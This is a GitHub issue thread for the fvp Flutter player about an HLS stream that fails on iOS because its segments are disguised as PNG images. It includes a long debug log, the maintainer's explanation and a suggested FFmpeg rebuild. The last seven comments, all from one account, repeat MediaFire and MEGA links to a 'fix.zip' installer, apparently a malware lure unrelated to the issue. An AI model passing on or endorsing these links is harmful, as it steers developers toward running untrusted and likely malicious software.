### ISSUE TITLE
个别视频ios无法播放，轮询几种解码方式都是no such file，但是ios自带播放器是可以播放的

### ISSUE THREAD

**Issue by yemin82** [wang-bin/fvp#141]
视频地址：https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8

Logging Error: Failed to initialize logging system. Log messages may be missing. If this issue persists, try setting IDEPreferLogStreaming=YES in the active scheme actions environment variables.
0.29.0 (git 34d4924) - Multimedia Development Kit. Copyright (c) 2016-2024 WangBin(QtAV author) <wbsecg1 at gmail.com>
Build for: iOS80000 Simulator/14.5.0 4KB x86_64; libc++170006; Apple Clang15.0.0 (clang-1500.3.9.4); 02:43:47 Aug 24 2024
flutter: The Dart VM service is listening on http://127.0.0.1:65310/Xs480UcIJ6M=/
flutter: fvp.FINE: 11:28:21.109: registerVideoPlayerPlatformsWith: {platforms: [ios], video.decoders: [videotoolbox, FFmpeg, VT]}
flutter: mdk.INFO: 11:28:21.164: 0.29.0 (git 34d4924) - Multimedia Development Kit. Copyright (c) 2016-2024 WangBin(QtAV author) <wbsecg1 at gmail.com>
flutter: Build for: iOS80000 Simulator/14.5.0 4KB x86_64; libc++170006; Apple Clang15.0.0 (clang-1500.3.9.4); 02:43:47 Aug 24 2024
flutter:
flutter: mdk.FINE: 11:28:21.165: global option: d3d11.sync.cpu = 1
flutter: mdk.FINE: 11:28:21.165: global option: UserAddress = 0x10d686e8b
flutter: mdk.FINE: 11:28:21.165: global option: subtitle.fonts.file = /Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/App.framework/flutter_assets/assets/subfont.ttf
AddInstanceForFactory: No factory registered for id <CFUUID 0x60000029de00> F8BB1C28-BAE8-11D6-9C31-00039315CD46
appId=102104122
create(https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8)
flutter: mdk.FINE: 11:28:31.722: default 0x107f37da0 new FrameReader...
flutter: mdk.FINE: 11:28:31.722: Registered audio backends: AudioQueue OpenAL null
flutter: mdk.FINE: 11:28:31.723: default 0x1063478a0 new FrameReader...
flutter: mdk.FINE: 11:28:31.723: Registered audio backends: AudioQueue OpenAL null
flutter: mdk.FINE: 11:28:31.723: 0x107c87bf0 player.Player()
flutter: mdk.FINE: 11:28:31.723: 0x107c87bf0 player.onEvent(1, 0x7000044f0e30)
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player.onStateChanged(1)
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player.onMediaStatus(1)
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player property: video.decoder = shader_resource=0
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player property: avformat.strict = experimental
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player property: avio.reconnect = 1
flutter: mdk.FINE: 11:28:31.724: 0x107c87bf0 player property: avio.reconnect_delay_max = 7
flutter: mdk.FINE: 11:28:31.725: 0x107c87bf0 player property: avio.protocol_whitelist = file,rtmp,http,https,tls,rtp,tcp,udp,crypto,httpproxy,data,concatf,concat,subfile
flutter: mdk.FINE: 11:28:31.725: 0x107c87bf0 player property: avformat.rtsp_transport = tcp
flutter: mdk.FINE: 11:28:31.725: 0x107c87bf0 player.setDecoders(video, [videotoolbox, FFmpeg, VT])
flutter: mdk.FINE: 11:28:31.725: video decoders: "videotoolbox", "FFmpeg", "VT"
flutter: mdk.FINE: 11:28:31.726: video decoders: "videotoolbox", "FFmpeg", "VT"
flutter: mdk.FINE: 11:28:31.726: 0x107c87bf0 player.setBufferRange(1000, 120000, 0)
flutter: mdk.FINE: 11:28:31.726: 0x107c87bf0 player.setMedia(https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8)
flutter: mdk.FINE: 11:28:31.726: default FrameReader0x107f37da0 state: 0=>0=>0, 0
flutter: mdk.INFO: 11:28:31.726: default0x107f37da0 stop, current state: 0
flutter: mdk.FINE: 11:28:31.727: AudioQueueStart ERROR: 0
flutter: mdk.FINE: 11:28:31.727: default FrameReader0x107f37da0 state: 0=>0=>0, 0
flutter: mdk.INFO: 11:28:31.727: default0x107f37da0 stop, current state: 0
flutter: mdk.FINE: 11:28:31.727: 0x107c87bf0 player.prepare(0, ..., 1282)
flutter: mdk.FINE: 11:28:31.727: AudioQueueStart ERROR: 0
flutter: mdk.INFO: 11:28:31.727: 0x110124600 MediaControl.prepare(0, ...) https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8
flutter: mdk.FINE: 11:28:31.728: default 0x107f37da0 FrameReader.start(0, ...)
flutter: mdk.FINE: 11:28:31.728: default 0x107f37da0 FrameReader::update MediaStatus 0=>0X2
flutter: fvp.FINE: 11:28:31.730: 652733690 player4425469792 onMediaStatus: MediaStatus(noMedia) => MediaStatus(+loading)
flutter: mdk.FINE: 11:28:31.731: default FrameReader0x107f37da0 state: 0=>0=>1, 0
flutter: mdk.FINE: 11:28:31.731: default FrameReader0x107f37da0 state: 0=>1=>1, 0
flutter: mdk.FINE: 11:28:31.731: default FrameReader0x107f37da0 request to pause 1, loaded: 0.
flutter: mdk.FINE: 11:28:31.732: default FrameReader0x107f37da0 state: 0=>1=>2, 0
flutter: mdk.FINE: 11:28:31.732: default FrameReader0x107f37da0 state requested: 2, current: 0
flutter: mdk.FINE: 11:28:31.732: virtual void mdk::AudioBackendAudioQueue::pause(bool)138 ERROR>>> AudioQueuePause(queue_): -50
flutter: mdk.FINE: 11:28:31.732:
flutter: mdk.FINE: 11:28:31.732: 0x107f37da0start frame reader thread: 0x700006d00000
flutter: mdk.FINE: 11:28:31.732: try to load av module(avutil): /Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg
flutter: mdk.FINE: 11:28:31.733: dlopen error: dlopen(/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/ffmpeg.framework/ffmpeg' (no such file)
flutter: mdk.FINE: 11:28:31.733: try to load av module(avutil): /Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/avutil.framework/avutil
flutter: mdk.FINE: 11:28:31.733: dlopen error: dlopen(/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/avutil.framework/avutil, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/avutil.framework/avutil' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/avutil.framework/avutil' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/avutil.framework/avutil' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/avutil.framework/avutil' (no such file)
flutter: mdk.FINE: 11:28:31.734: try to load av module(avutil): ffmpeg.framework/ffmpeg
flutter: mdk.FINE: 11:28:31.734: dlopen error: dlopen(ffmpeg.framework/ffmpeg, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRootffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/Libraries/ffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg' (no such file), 

'/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/avcodec.framework/avcodec' (no such file)
flutter: mdk.FINE: 11:28:32.012: try to load av module(avcodec): ffmpeg.framework/ffmpeg
flutter: mdk.FINE: 11:28:32.013: dlopen error: dlopen(ffmpeg.framework/ffmpeg, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRootffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/Libraries/ffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/ffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Frameworks/ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/usr/lib/swift/ffmpeg.framework/ffmpeg' (no such file), '/usr/lib/swift/ffmpeg.framework/ffmpeg' (no such file, not in dyld cache), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/ffmpeg.framework/ffmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/ffmpeg.framework/ffmpeg' (no such file), '/usr/lib/ffmpeg.framework/ffmpeg' (no such file, not in dyld cache), 'ffmpeg.framework/ffmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/ffmpeg.framework/ffmpeg' (no such file)
flutter: mdk.FINE: 11:28:32.013: try to load av module(avcodec): avcodec.framework/avcodec
flutter: mdk.FINE: 11:28:32.014: dlopen error: dlopen(avcodec.framework/avcodec, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/avcodec.framework/avcodec' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRootavcodec.framework/avcodec' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/Libraries/avcodec.framework/avcodec' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/avcodec.framework/avcodec' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Frameworks/avcodec.framework/avcodec' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/usr/lib/swift/avcodec.framework/avcodec' (no such file), '/usr/lib/swift/avcodec.framework/avcodec' (no such file, not in dyld cache), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/avcodec.framework/avcodec' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/avcodec.framework/avcodec' (no such file), '/usr/lib/avcodec.framework/avcodec' (no such file, not in dyld cache), 'avcodec.framework/avcodec' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/avcodec.framework/avcodec' (no such file)
flutter: mdk.FINE: 11:28:32.014: try to load av module(avcodec): FFmpeg.framework/FFmpeg
flutter: mdk.FINE: 11:28:32.015: dlopen error: dlopen(FFmpeg.framework/FFmpeg, 0x0005): tried: '/Users/yemin/Library/Developer/Xcode/DerivedData/Runner-boszyduerkmjuzbpghqsuzkiezpr/Build/Products/Debug-iphonesimulator/FFmpeg.framework/FFmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRootFFmpeg.framework/FFmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/Libraries/FFmpeg.framework/FFmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/mdk.framework/FFmpeg.framework/FFmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Frameworks/FFmpeg.framework/FFmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/usr/lib/swift/FFmpeg.framework/FFmpeg' (no such file), '/usr/lib/swift/FFmpeg.framework/FFmpeg' (no such file, not in dyld cache), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/FFmpeg.framework/FFmpeg' (no such file), '/Users/yemin/Library/Developer/CoreSimulator/Devices/BAFFF907-40E9-4430-B75F-991AAD627F81/data/Containers/Bundle/Application/205A2F69-C5B0-4A47-82B3-826147B99EDE/Runner.app/Frameworks/FFmpeg.framework/FFmpeg' (no such file), '/usr/lib/FFmpeg.framework/FFmpeg' (no such file, not in dyld cache), 'FFmpeg.framework/FFmpeg' (no such file), '/Library/Developer/CoreSimulator/Volumes/iOS_21F79/Library/Developer/CoreSimulator/Profiles/Runtimes/iOS 17.5.simruntime/Contents/Resources/RuntimeRoot/System/Library/Frameworks/FFmpeg.framework/FFmpeg' (no such file)
flutter: mdk.FINE: 11:28:32.015: Selected avcodec runtime version: 61.11.100 (build: 61.11.100), license: LGPL version 2.1 or later
flutter: mdk.FINE: 11:28:32.016: avcodec_descriptor_next0x1089524dd
flutter: mdk.FINE: 11:28:32.020: default 0x107f37da0 FrameReader::update MediaStatus 0X2=>0X2
flutter: mdk.FINE: 11:28:32.021: before avformat_open_input. io: 0x0()/pb: 0x0, url: https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8
flutter: mdk.FINE: 11:28:32.022: FFmpeg/Libav runtime git-2024-08-17-5c1c032-avbuild
flutter: mdk.FINE: 11:28:32.227: [FFmpeg:hls] Skip ('#EXT-X-VERSION:3')
flutter: mdk.FINE: 11:28:32.227: [FFmpeg:hls] Skip ('#EXT-X-ALLOW-CACHE:YES')
flutter: mdk.FINE: 11:28:32.281: [FFmpeg:hls] Opening 'https://mdn.alipayobjects.com/open_content/afts/img/A*ibbTQZGTzsoAAAAAAAAAAAAAcFx1AQ/original' for reading
flutter: mdk.FINE: 11:28:32.716: [FFmpeg:hls] Opening 'https://mdn.alipayobjects.com/open_content/afts/img/A*nViNQIh0GrgAAAAAAAAAAAAAcFx1AQ/original' for reading
flutter: mdk.FINE: 11:28:32.917: after avformat_open_input. pb: 0x10754d300, iformat: 0x108ed80c8, context flags: 2097152, input format flags: 49664
flutter: mdk.FINE: 11:28:32.919: [FFmpeg:hls] Could not find codec parameters for stream 0 (Video: png, none): unspecified size
flutter: Consider increasing the value for the 'analyzeduration' (0) and 'probesize' (5000000) options
flutter: mdk.FINE: 11:28:32.919: unsupported avformat options:  rtsp_transport=tcp
flutter: mdk.FINE: 11:28:32.919: supports 208 ffmpeg sw pixel formats. unsupported: uyyvyy411 rgb8 x2rgb10be x2bgr10be gbrap14be gbrap14le
flutter: mdk.INFO: 11:28:32.919: Format: hls, range: 0 +2753520ms, bitrate: 298, size: 0
flutter: Programs:
flutter:  Program id 0
flutter:  Metadata:
flutter:   variant_bitrate: 0
flutter:  Video:
flutter:  track 0  stream#0, range: 0 +2753520ms, frames: 0
flutter:   codec: png tag: 0 profile: -99 level: -99, unknown, bpc:0, bpp:0(), channels:(), map: 0 0 0 0, bitrate: 0, 0x0, fps: 25, bframes: 0
flutter:   Metadata:
flutter:    variant_bitrate: 0
flutter:
flutter: mdk.FINE: 11:28:32.919: 0x110124600 prepared callback is invoked
flutter: mdk.FINE: 11:28:32.933: default 0x107f37da0 FrameReader::update MediaStatus 0X2=>0X4
flutter: fvp.FINE: 11:28:32.933: 652733690 player4425469792 onMediaStatus: MediaStatus(+loading) => MediaStatus(+loaded)
flutter: mdk.INFO: 11:28:32.934: 0x107f37da0 ***buffering progress 0%***
flutter: mdk.FINE: 11:28:32.934: default 0x107f37da0 FrameReader::update MediaStatus 0X4=>0X14
flutter: mdk.FINE: 11:28:32.934: virtual void mdk::AudioBackendAudioQueue::pause(bool)138 ERROR>>> AudioQueuePause(queue_): -50
flutter: mdk.FINE: 11:28:32.935:
flutter: fvp.FINE: 11:28:32.935: 652733690 player4425469792 onMediaStatus: MediaStatus(+loaded) => MediaStatus(+loaded+buffering)
flutter: mdk.INFO: 11:28:32.935: ++++++++++++BUFFERING START++++++++++++
flutter: mdk.FINE: 11:28:32.935:
flutter: fvp.FINE: 11:28:32.935: 652733690 player4425469792 onEvent: reader.buffering -  - 0
flutter: mdk.FINE: 11:28:32.936: default 0x107f37da0 FrameReader::update MediaStatus 0X14=>0X54
flutter: fvp.FINE: 11:28:32.936: 652733690 player4425469792 onMediaStatus: MediaStatus(+loaded+buffering) => MediaStatus(+loaded+buffering+end)
flutter: mdk.FINE: 11:28:32.936: read packet error. FrameReader@0x107f37da0 sending Packet::End to all packet queues. PacketIO@0x107558960 ->url: https://yundunm3.czys.art:88/vtt/gc02/sifangguan/sifangguan01.m3u8
flutter: mdk.FINE: 11:28:32.936: default FrameReader0x107f37da0 state: 0=>2=>1, 1
flutter: mdk.FINE: 11:28:32.936: default FrameReader0x107f37da0 update state: 0=>1
flutter: fvp.FINE: 11:28:32.937: 652733690 player4425469792 onPlaybackStateChanged: PlaybackState.stopped => PlaybackState.playing
flutter: mdk.FINE: 11:28:32.937: default FrameReader0x107f37da0 state: 1=>1=>2, 1
flutter: mdk.FINE: 11:28:32.937: default FrameReader0x107f37da0 update state: 1=>2
flutter: fvp.FINE: 11:28:32.937: 652733690 player4425469792 onPlaybackStateChanged: PlaybackState.playing => PlaybackState.paused
flutter: mdk.FINE: 11:28:32.937: before changed() 54
flutter: mdk.FINE: 11:28:32.937: default FrameReader0x107f37da0 state: 2=>2=>0, 0
flutter: mdk.FINE: 11:28:32.937: 0x107f37da0 unload, current status 0x54, invalid: 0, loading: 0, loaded: 4, buffering: 16, seeking: 0, prepared: 0, EOF: 64
flutter: mdk.FINE: 11:28:32.937: 0x600003d0b110 request avformat input interrupt
flutter: mdk.INFO: 11:28:32.937: 0x107f37da0 ***buffering progress 100%***
flutter: mdk.FINE: 11:28:32.937: default 0x107f37da0 FrameReader::update MediaStatus 0X54=>0X164
flutter: mdk.FINE: 11:28:32.938: virtual void mdk::AudioBackendAudioQueue::pause(bool)138 ERROR>>> AudioQueuePause(queue_): -50
flutter: mdk.FINE: 11:28:32.938:
flutter: fvp.FINE: 11:28:32.938: 652733690 player4425469792 onMediaStatus: MediaStatus(+loaded+buffering+end) => MediaStatus(+loaded+prepared+buffered+end)
flutter: mdk.INFO: 11:28:32.938: ++++++++++++BUFFERING END++++++++++++
flutter: mdk.FINE: 11:28:32.938:
flutter: fvp.FINE: 11:28:32.938: 652733690 player4425469792 onEvent: reader.buffering -  - 100
flutter: mdk.FINE: 11:28:32.938: interrupted by user
flutter: mdk.FINE: 11:28:32.938: interrupted by user
flutter: mdk.FINE: 11:28:32.938: interrupted by user
flutter: mdk.FINE: 11:28:32.938: 0x700006d00000default 0x107f37da0 update @1149: reset status_mask. status: 161
flutter: mdk.FINE: 11:28:32.938: default 0x107f37da0 FrameReader::update MediaStatus 0X164=>0X41
flutter: fvp.FINE: 11:28:32.939: 652733690 player4425469792 onMediaStatus: MediaStatus(+loaded+prepared+buffered+end) => MediaStatus(+unloaded+end)
flutter: mdk.FINE: 11:28:32.939: default FrameReader0x107f37da0 state: 2=>0=>0, 1
flutter: mdk.FINE: 11:28:32.939: default FrameReader0x107f37da0 update state: 2=>0
flutter: fvp.FINE: 11:28:32.939: 652733690 player4425469792 onPlaybackStateChanged: PlaybackState.paused => PlaybackState.stopped

**Comment by wang-bin** [comment]
参考[这个](https://github.com/wang-bin/fvp/issues/121#issuecomment-2295748218)后面的讨论。 这类视频里的切片文件是非标准的，它故意伪装成png图片。系统播放器能播是因为根本不去判断是否为png文件，直接假设ts文件。这种非标准文件我这边不做支持，其他播放器比如mpv, vlc, ffplay也都不能播。你要想播的话自己编译ffmpeg去掉png，参考 https://github.com/wang-bin/fvp/issues/121#issuecomment-2306109069 ，ios编译好后运行`./dylib2framework.sh lib/libffmpeg.dylib`生成FFmpeg.framework，然后把FFmpeg.framework添加你程序依赖里

**Comment by Predidit** [comment]
使用 fvp.registerWith() 注册时，可以使用官方 video_player 包已经实现的支持 (例如 iOS)。

PS: 移除 png 支持可能会导致部分包含 png 图片文件作为封面的 .mkv 格式视频无法打开。

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
